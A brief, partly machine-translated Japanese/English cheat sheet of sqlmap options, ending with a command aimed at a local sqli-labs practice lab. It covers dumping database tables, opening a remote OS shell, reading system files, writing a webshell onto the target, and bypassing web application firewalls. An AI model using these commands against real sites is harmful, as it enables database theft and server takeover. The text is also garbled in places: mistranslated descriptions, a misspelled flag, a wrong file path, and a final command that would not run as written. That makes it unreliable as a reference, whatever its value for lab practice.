sqlmapの高度な使用法
Advanced Usage Sqlmap
sqlmapの高度な使用法
-D -T -C --dump Get all data --batch #Automatic injection attack --user #Get database user --is-dba #Check whether the user is an administrator --current-db #View the current database --current-user #View current user --roles #Get database user --schema #Get database name --tables #Get table name --columns #Get field name --os-cmd=CMD #Execute a system command --os-shell #Create a shell of the other party's operating system, remotely execute system commands --sql-shell #Create a sqlshell --sql-query=QUERY #Execute a sql statement. --file-read=RFILE #Read a file of the target site. Example: --file-read='/etc/password' --file-write=WFILE #Write to a file on the target site, usually combined with --sql-query. Example: --sql-query='select 'Sentence Trojan Horse' --file-write='shell.php' --file-dest=DFILE #Use absolute path to write. --identify-waf #Detect Waf Example: sqlmap -u --identify-waf --tamper=unmagicquotes #If there is WAF, you can use the script to bypass --skp-waf #Bypass waf detection --os= #Specify the operating system --technique #Specify the sqlmap injection method, which can save time. If it is wide byte injection, you need to use --tamper=unmagicquotes For example, specify the use of time blind note: sqlmap -u --technique T B: Boolean based blind Q: Inline queries (inlin queries) T: time based blind U: Union query (union query based) E: error based S: stack queries -p specifies the parameters Example: sqlmap -u 'http://127.0.0.1?id=1' -p id --dbms= Specify the database to save time Example: sqlmap -u --dbms=mysql -v Specify the detailed level of the echo information Example: sqlmap -u -v 3 0: Only display Python tracebacks information, error information [ERROR] and key information [CRITICAL] 1: Display general information [INFO] and warning information [WARNING] at the same time 2: Display debugging information at the same time [DEBUG] 3: Simultaneously display the attack load used for injection 4: Display HTTP requests at the same time 5: Display HTTP response headers at the same time 6: Display the HTTP response body at the same time. --level #Test level, 1-5, default v1, the higher the level, the more payload and the slower the speed. v2: cookie v3:user-agent,referer v5:host --risk #Raising the risk level will increase the risk of data tampering. risk 2: event-based testing risk 3: or statement testing risk 4: update testing kaliでsqli-labsのデータを取得し、パラメーターIDを指定し、データベースをmysqlとして指定し、インジェクションメソッドを共同インジェクションとして指定し、データベーステーブル名フィールドを指定し、–dumpを使用してすべてのデータを取得します。これは、sqlmap自体が何を検出するためです。メソッドは注入に使用されます。使用するメソッド、ペイロードがわかっていて、条件を指定すると、sqlmapは高速に実行されます。
sqlmap -u“ 192.168.10.1 / sqli-labs-master / Less-1 /?id = 1” -p id --dbms = mysql --technique = U --level 1 --risk 3 -D security -T users -Cパスワード--dump
